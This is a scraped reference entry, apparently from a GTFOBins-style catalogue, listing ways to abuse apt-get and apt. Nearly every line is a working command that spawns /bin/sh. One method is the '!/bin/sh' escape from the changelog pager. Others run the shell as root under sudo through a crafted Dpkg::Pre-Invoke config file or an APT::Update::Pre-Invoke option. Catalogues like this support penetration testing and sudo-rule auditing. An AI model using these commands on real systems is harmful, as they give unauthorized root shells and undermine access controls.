description |
code |
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. |
apt-get changelog apt
!/bin/sh
|
|
|
description |
code |
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. |
sudo apt-get changelog apt
!/bin/sh
|
|
description |
code |
For this to work the target package (e.g., `sl`) must not be installed. |
TF=$(mktemp)
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
sudo apt install -c $TF sl
|
|
description |
code |
When the shell exits the `update` command is actually executed. |
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh |
|
|